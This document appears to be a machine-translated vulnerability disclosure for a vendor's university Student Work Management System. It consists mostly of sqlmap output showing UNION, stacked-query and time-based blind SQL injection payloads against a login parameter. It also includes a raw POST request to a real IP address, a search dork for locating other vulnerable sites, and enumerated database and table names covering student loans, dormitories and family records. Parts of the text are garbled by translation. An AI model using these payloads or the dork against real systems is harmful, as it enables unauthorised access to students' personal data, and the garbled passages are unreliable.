A university management system has the general SQL injection vulnerability.
There is an injection vulnerability in the front-end and back-end of the Student Work Management System of Colleges and Universities Under Xi'an aoda Software Engineering Co., Ltd.
1. University Student Work Management System Front-end
Intitle: Student Work Management System Login/List. aspx? ID =
Http: // xxx/Login/List. aspx? ID = 99
Sqlmap identified the following injection points with a total of 100 HTTP (s) requests:
---
Place: POSTParameter: txtUserIdType: UNION queryTitle: Generic UNION query (NULL)-6 columnsPayload: _ EVENTTARGET = & __ EVENTARGUMENT = & __ VIEWSTATE =/users + tables/Tables + k + WFpeiLseaWh + WNleW8leWPtycKHwECCmRkZI + logs & __ EVENTVALIDATION = /wEWBwLo5YDJCAKz8dy8BQKd + combine & txtUserId = 1' union all select null, NULL, CHAR (58) + CHAR (98) + CHAR (104) + CHAR (120) + CHAR (58) + CHAR (86) + CHAR (105) + CHAR (99) + CHAR (109) + CHAR (119) + CHAR (79) + CHAR (68) + CHAR (83) + CHAR (71) + CHAR (79) + CHAR (58) + CHAR (120) + CHAR (112) + CHAR (112) + CHAR (58 ), NULL -- & txtPwd = 1 & RadioButtonList1 = 1 & Button1 = login Type: stacked queriesTitle: Microsoft SQL Server/Sybase stacked queriesPayload: _ EVENTTARGET = & __ EVENTARGUMENT = & __ VIEWSTATE =/users + tables/Tables + k + WFpeiLseaWh + WNleW8leWPtycKHwECCmRkZI + logs & __ EVENTVALIDATION = /wEWBwLo5YDJCAKz8dy8BQKd + response & txtUserId = 1 '; waitfor delay '0: 0: 5'; -- & txtPwd = 1 & RadioButtonList1 = 1 & Button1 = login Type: AND/OR time-based blintitle: microsoft SQL Server/Sybase time-based blinpayload: _ EVENTTARGET = & __ EVENTARGUMENT = & __ VIEWSTATE =/users + tables/Tables + k + WFpeiLseaWh + WNleW8leWPtycKHwECCmRkZI + logs & __ EVENTVALIDATION = /wEWBwLo5YDJCAKz8dy8BQKd + response & txtUserId = 1 'waitfor delay' 0: 0: 5' -- & txtPwd = 1 & RadioButtonList1 = 1 & Button1 = login --- sqlmap identified the following injection points with a total of 0 HTTP (s) requests: --- Place: POSTParameter: txtUserIdType: UNION queryTitle: Generic UNION query (NULL)-6 columnsPayload: _ EVENTTARGET = & __ EVENTARGUMENT = & __ VIEWSTATE =/users + tables/Tables + k + WFpeiLseaWh + WNleW8leWPtycKHwECCmRkZI + logs & __ EVENTVALIDATION = /wEWBwLo5YDJCAKz8dy8BQKd + combine & txtUserId = 1' union all select null, NULL, CHAR (58) + CHAR (98) + CHAR (104) + CHAR (120) + CHAR (58) + CHAR (86) + CHAR (105) + CHAR (99) + CHAR (109) + CHAR (119) + CHAR (79) + CHAR (68) + CHAR (83) + CHAR (71) + CHAR (79) + CHAR (58) + CHAR (120) + CHAR (112) + CHAR (112) + CHAR (58 ), NULL -- & txtPwd = 1 & RadioButtonList1 = 1 & Button1 = login Type: stacked queriesTitle: Microsoft SQL Server/Sybase stacked queriesPayload: _ EVENTTARGET = & __ EVENTARGUMENT = & __ VIEWSTATE =/users + tables/Tables + k + WFpeiLseaWh + WNleW8leWPtycKHwECCmRkZI + logs & __ EVENTVALIDATION = /wEWBwLo5YDJCAKz8dy8BQKd + response & txtUserId = 1 '; waitfor delay '0: 0: 5'; -- & txtPwd = 1 & RadioButtonList1 = 1 & Button1 = login Type: AND/OR time-based blintitle: microsoft SQL Server/Sybase time-based blinpayload: _ EVENTTARGET = & __ EVENTARGUMENT = & __ VIEWSTATE =/users + tables/Tables + k + WFpeiLseaWh + WNleW8leWPtycKHwECCmRkZI + logs & __ EVENTVALIDATION = /wEWBwLo5YDJCAKz8dy8BQKd + response & txtUserId = 1 'waitfor delay' 0: 0: 5' -- & txtPwd = 1 & RadioButtonList1 = 1 & Button1 = login --- current user: 'auda' current database: 'studworkxidian' available databases [7]: [*] master [*] model [*] msdb [*] Northwind [*] pubs [*] StudWorkXiDian [*] tempdb cross-Database: pubs [14 tables] + -------------------- + | [dbo/awthors] | [dbo/discounts] | [dbo/employee] | [dbo/jobs] | [dbo/ pwb_info] | [dbo/pwblishers] | [dbo/roysched] | [dbo/sales] | [dbo/stores \ t] | [dbo/sysconstraints] | | [dbo/syssegments] | [dbo/titleawthor] | [dbo/titles \ r \ t] | [dbo/titleview] | + -------------------- +
POST http://202.117.112.29/Login/loginpageforuserb.aspx HTTP/1.1Host: 202.117.112.29User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:18.0) Gecko/20100101 Firefox/18.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateReferer: http://202.117.112.29/Login/loginpageforuserb.aspxCookie: ASP.NET_SessionId=oj5sbgn3ovvansabkijagoazConnection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 719__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKMTk4Njc5NTU4Mg9kFgICAw9kFgQCAQ8PFgQeB1Rvb2xUaXAFYuKXj%2BS4jeiDveS4uuepugril4%2FlhYHorrjmnIDlpJrovpPlhaXlrZfnrKbmlbA6MzAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi%2Bk%2BWFpeiLseaWh%2BWNleW8leWPtycKHglNYXhMZW5ndGgCHhYCHglvbmtleWRvd24FMWphdmFzY3JpcHQ6IGlmKGV2ZW50LmtleUNvZGU9PTEzKWV2ZW50LmtleUNvZGU9OTtkAgMPDxYEHwAFYuKXj%2BS4jeiDveS4uuepugril4%2FlhYHorrjmnIDlpJrovpPlhaXlrZfnrKbmlbA6MTAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi%2Bk%2BWFpeiLseaWh%2BWNleW8leWPtycKHwECCmRkZI%2B9NsB7KY0t2kYS4plm3wayLkau&__EVENTVALIDATION=%2FwEWBwLo5YDJCAKz8dy8BQKd%2B7qdDgL444i9AQL544i9AQL3jKLTDQKM54rGBpRQKLPGwwZ77hXVwLb83lpgACQP&txtUserId=1&txtPwd=1&RadioButtonList1=1&Button1=%E7%99%BB+%E5%BD%95Place: POSTParameter: txtUserIdType: UNION queryTitle: Generic UNION query (NULL) - 6 columnsPayload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKMTk4Njc5NTU4Mg9kFgICAw9kFgQCAQ8PFgQeB1Rvb2xUaXAFYuKXj+S4jeiDveS4uuepugril4/lhYHorrjmnIDlpJrovpPlhaXlrZfnrKbmlbA6MzAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi+k+WFpeiLseaWh+WNleW8leWPtycKHglNYXhMZW5ndGgCHhYCHglvbmtleWRvd24FMWphdmFzY3JpcHQ6IGlmKGV2ZW50LmtleUNvZGU9PTEzKWV2ZW50LmtleUNvZGU9OTtkAgMPDxYEHwAFYuKXj+S4jeiDveS4uuepugril4/lhYHorrjmnIDlpJrovpPlhaXlrZfnrKbmlbA6MTAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi+k+WFpeiLseaWh+WNleW8leWPtycKHwECCmRkZI+9NsB7KY0t2kYS4plm3wayLkau&__EVENTVALIDATION=/wEWBwLo5YDJCAKz8dy8BQKd+7qdDgL444i9AQL544i9AQL3jKLTDQKM54rGBpRQKLPGwwZ77hXVwLb83lpgACQP&txtUserId=1' UNION ALL SELECT NULL, NULL, NULL, NULL, CHAR(58)+CHAR(98)+CHAR(104)+CHAR(120)+CHAR(58)+CHAR(86)+CHAR(105)+CHAR(99)+CHAR(109)+CHAR(119)+CHAR(79)+CHAR(68)+CHAR(83)+CHAR(71)+CHAR(79)+CHAR(58)+CHAR(120)+CHAR(112)+CHAR(112)+CHAR(58),NULL-- &txtPwd=1&RadioButtonList1=1&Button1=? ?Type: stacked queriesTitle: Microsoft SQL Server/Sybase stacked queriesPayload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKMTk4Njc5NTU4Mg9kFgICAw9kFgQCAQ8PFgQeB1Rvb2xUaXAFYuKXj+S4jeiDveS4uuepugril4/lhYHorrjmnIDlpJrovpPlhaXlrZfnrKbmlbA6MzAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi+k+WFpeiLseaWh+WNleW8leWPtycKHglNYXhMZW5ndGgCHhYCHglvbmtleWRvd24FMWphdmFzY3JpcHQ6IGlmKGV2ZW50LmtleUNvZGU9PTEzKWV2ZW50LmtleUNvZGU9OTtkAgMPDxYEHwAFYuKXj+S4jeiDveS4uuepugril4/lhYHorrjmnIDlpJrovpPlhaXlrZfnrKbmlbA6MTAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi+k+WFpeiLseaWh+WNleW8leWPtycKHwECCmRkZI+9NsB7KY0t2kYS4plm3wayLkau&__EVENTVALIDATION=/wEWBwLo5YDJCAKz8dy8BQKd+7qdDgL444i9AQL544i9AQL3jKLTDQKM54rGBpRQKLPGwwZ77hXVwLb83lpgACQP&txtUserId=1'; WAITFOR DELAY '0:0:5';--&txtPwd=1&RadioButtonList1=1&Button1=? ?Type: AND/OR time-based blindTitle: Microsoft SQL Server/Sybase time-based blindPayload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKMTk4Njc5NTU4Mg9kFgICAw9kFgQCAQ8PFgQeB1Rvb2xUaXAFYuKXj+S4jeiDveS4uuepugril4/lhYHorrjmnIDlpJrovpPlhaXlrZfnrKbmlbA6MzAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi+k+WFpeiLseaWh+WNleW8leWPtycKHglNYXhMZW5ndGgCHhYCHglvbmtleWRvd24FMWphdmFzY3JpcHQ6IGlmKGV2ZW50LmtleUNvZGU9PTEzKWV2ZW50LmtleUNvZGU9OTtkAgMPDxYEHwAFYuKXj+S4jeiDveS4uuepugril4/lhYHorrjmnIDlpJrovpPlhaXlrZfnrKbmlbA6MTAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi+k+WFpeiLseaWh+WNleW8leWPtycKHwECCmRkZI+9NsB7KY0t2kYS4plm3wayLkau&__EVENTVALIDATION=/wEWBwLo5YDJCAKz8dy8BQKd+7qdDgL444i9AQL544i9AQL3jKLTDQKM54rGBpRQKLPGwwZ77hXVwLb83lpgACQP&txtUserId=1' WAITFOR DELAY '0:0:5'--&txtPwd=1&RadioButtonList1=1&Button1=? ?---[15:36:02] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2003web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2000[15:36:02] [INFO] fetching current usercurrent user: 'auda'[15:36:02] [INFO] fetching current databasecurrent database: 'StudWorkXiDian'[15:36:02] [INFO] fetching database names[15:36:02] [INFO] the SQL query used returns 7 entries[15:36:02] [INFO] resumed: "master"[15:36:02] [INFO] resumed: "model"[15:36:02] [INFO] resumed: "msdb"[15:36:02] [INFO] resumed: "Northwind"[15:36:02] [INFO] resumed: "pubs"[15:36:02] [INFO] resumed: "StudWorkXiDian"[15:36:02] [INFO] resumed: "tempdb"available databases [7]:[*] master[*] model[*] msdb[*] Northwind[*] pubs[*] StudWorkXiDian[*] tempdb
[257 tables] + ------------------------------- + | dbo. logTemp | dbo. test | dbo. vstipend_ApplyInfo | dbo. vsubsidy_ApplyInfo | dbo. [tsys_Modules _ test] | dbo. dtproperties | dbo. sysconstraints | dbo. syssegments | dbo. tAcc_File | dbo. tAppoinmentRelation | dbo. tAppointment | dbo. tAppointmentType | dbo. tAppointmentTypeExplain | dbo. tArr_Accessories | dbo. tArr_ArrType | dbo. tArr_Auditing | dbo. tArr_requiteType | dbo. tCadre_InWork | dbo. tCadre_OutWork | dbo. tCadre_StudWork | dbo. tDorm_Area | dbo. tDorm_Bed | dbo. tDorm_Building | dbo. tDorm_ChargeHistory | dbo. tDorm_History | dbo. tDorm_RewardHistory | dbo. tDorm_Room | dbo. tDorm_RoomMaster | dbo. tDorm_RoomType | dbo. tDrom_BuildingUser | dbo. tFile_Video | dbo. tGB_GMZ | dbo. tGB_HYZK | dbo. tGB_JKZK | dbo. tGB_SJGGHDQ | dbo. tGB_XB | dbo. tGB_XW | dbo. tGB_XZQH | dbo. tGB_ZZMM | dbo. tJQRY_Apply | dbo. tJQRY_SP | dbo. tJQRY_Type | dbo. tOther_ArcAgent | dbo. tOther_ArcBase | dbo. tOther_ArcContent | dbo. tOther_ArcItem | dbo. tOther_ArcTurnOver | dbo. tPoor_Student | dbo. tPopedom_Atom | dbo. tReg_register | dbo. tReplyAppointment | dbo. tschooloanlevel | dbo. tschooloanproportion | dbo. tschooloanrefund | dbo. tschooloans | dbo. tStudCadre_Info | dbo. tStudCadre_Type | dbo. tStudCadre_Unit | dbo. tStud_AllowApply | dbo. tTemp_Apply | reschedule | dbo.tar m_CentType | dbo.tar restart | dbo.tar m_StudRecord | descrim_policy | dbo.tar r_Info | dbo.tar r_repay | dbo. tasl_affrem | dbo. tasl_Bank | dbo. tasl_BankAuditing | dbo. tasl_BankBargain | dbo. tasl_Breach | dbo. tasl_End | dbo. tasl_Extend | dbo. tasl_Familial | dbo. tasl_Imburse | dbo. tasl_LoanType | dbo. tasl_Postponed | dbo. tasl_SchoolAuditing | dbo. tasl_SchoolAuditingIdea | dbo. tasl_StudRequisition | dbo. tasl_Whither | dbo. tbase_Department | dbo. tbase_Teacher | dbo. tbase_User | dbo. tcgt_StudCourse2 | dbo. tcgt_StudCourse3 | dbo. tcgt_StudRecord2 | dbo. tcgt_StudRecord3 | dbo. tcgt_stdResultCell | dbo. tcgt_stdResultCell2 | dbo. tcgt_stdResultCell3 | dbo. tcgt_stdScale2 | dbo. tcgt_stdScale3 | dbo. tcmoe_RewardLevel | dbo. tcmoe_RewardType | dbo. tcmoe_StatusChangeCause | dbo. tcmoe_StatusChangeType | dbo. tcode_Academic | dbo. tcode_BloodType | dbo. tcode_CultivateMode | dbo. tcode_Educate | dbo. tcode_Emigrant | dbo. tcode_Job | dbo. tcode_LoanState | dbo. tcode_Post | dbo. tcode_ProSchoolAccount | dbo. tcode_PsychologyLevel | dbo. tcode_StudType | dbo. tcode_TeacherRole | dbo. tcode_poorType | dbo. tcpt_BranchActivity | dbo. tcpt_ClassRelation | dbo. tcpt_Document | dbo. tcpt_MemberStudy | dbo. tcpt_PartyActive | dbo. tcpt_PartyBranch | dbo. tcpt_PartyMember | dbo. tcpt_PartyPrep | dbo. tcpt_PersonRelation | dbo. tcpt_Requisition | dbo. terr_Accessories | dbo. terr_Auditing | dbo. terr_Auditing2 | dbo. terr_ErrCause | dbo. terr_ErrInfo | dbo. terr_ErrType | dbo. terr_PunishType | dbo. terr_Remove | dbo. titem_PartyBranchType | dbo. titem_PartyMemberType | dbo. titem_PartySchoolType | dbo. tmem_BookEnrol | dbo. tmem_ChooseCadre | dbo. tmem_Development | dbo. tmem_DevelopmentNum | dbo. tmem_MemBerDocment | dbo. tmem_MemCharge | dbo. tmem_Member | dbo. tmem_OrgType | dbo. tmem_Party | dbo. tmem_PartyNum | dbo. tmem_Record | dbo. tmem_Rewards | dbo. tmem_TrainDepartment | dbo. tmem_TrainManInfo | dbo. tmem_orgMan | dbo. tmem_organization | dbo. tmema_ActivityApply | dbo. tmema_ActivityAudit | dbo. tmema_ActivityField | dbo. tmema_AssnJob | dbo. tmema_AssnMember | dbo. tmemp_Activity | dbo. tmemp_ComAuthor | dbo. tmemp_ComManuscript | dbo. tmemp_ComReport | dbo. tmemp_PublicationIssue | dbo. tmemp_PulicJob | dbo. tpopedom_UserBackManage | dbo. tpopedom_UserModule | dbo. treward_Information | dbo. treward_InformationG | dbo. treward_TypeG | dbo. tsafety_InsurePayforMoney | dbo. tsafety_InsureRegStudent | dbo. tsafety_SafetyGrade | dbo. tsafety_Type | dbo. tschol_Annotion | dbo. tschol_Apply | dbo. tschol_Classify | dbo. tschol_Quotas | dbo. tschol_RankObj | dbo. tssc_History | dbo. tstipend_Annotion | dbo. tstipend_Apply | dbo. tstipend_Apply_Temp | dbo. tstipend_Classify | dbo. tstipend_Quotas | dbo. tstipend_RankObj | dbo. tstud_Accessories | dbo. tstud_CardPrint | dbo. tstud_CardPrintFiled | dbo. tstud_Family | dbo. tstud_FieldEdit | dbo. tstud_Student_BKS | dbo. tstud_Student_Temp_BKS | dbo. tstud_Student_Temp_YJS | dbo. tstud_Student_YJS | dbo. tsubsidy_Annotion | dbo. tsubsidy_Apply | dbo. tsubsidy_Apply_Temp | dbo. tsubsidy_Classify | dbo. tsubsidy_Quotas | dbo. tsubsidy_RankObj | dbo. tsys_Download | dbo. tsys_FriendlyLink | dbo. tsys_Notice | dbo. tsys_NoticeType | dbo. tsys_Options | dbo. tsys_VoteList | dbo. tsys_VoteProject | dbo. tsys_VoteRen | dbo. tsys_loginLog | dbo. tsys_loginSession | dbo. twork_Apply | dbo. twork_Apply_Temp | dbo. twork_CheckIn | dbo. twork_Department | dbo. twork_PayMoney | dbo. twork_PostObj | dbo. twork_PostType | dbo. txm_PYFS | dbo. txm_SS | dbo. txm_XL | dbo. txm_0000x | dbo. txm_XSZT | dbo. vAloan_ListAff | dbo. vAloan_ListBasic | dbo. vAloan_ListExtend | dbo. vArr_ApplyInfo_BKS | dbo. vArr_ApplyInfo_YJS | dbo. vCadreGroup_state | dbo. vDorm_AllRoomDetail | dbo. vDorm_Bed | dbo. vDorm_BuidingCode | dbo. vDorm_CanBePreared | dbo. vDorm_CanUseBed | dbo. vDorm_Preared | dbo. vDorm_UsedBed | dbo. vDorm_building | dbo. vDorm_room | dbo. vDorm_student | dbo. vSchol_QuotaForDept | dbo. vschooloans_bks | dbo. vbase_Department | dbo. vcgt_StudSumRecord2 | dbo. vcgt_StudSumRecord3 | dbo. vcgt_student | dbo. vparty_PersonRelation | dbo. vparty_StatBranchSum | dbo. vpopedom_UserModule | dbo. vschol_QuotaForClass | dbo. vstipend_Classify | dbo. vstipend_QuotaForClass | dbo. vstipend_QuotaForDept | dbo. vstipend_QuotaForGrade | dbo. vstud_Student_BKS | dbo. vstud_Student_Temp_BKS | dbo. vstud_Student_YJS | dbo. vsubsidy_Classify | dbo. vsubsidy_QuotaForClass | dbo. vsubsidy_QuotaForDept | dbo. vsubsidy_QuotaForGrade | dbo. vtstud_Student_Temp_YJS | dbo. vwork_Department | + ------------------------------- +
Filter multiple parameters
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
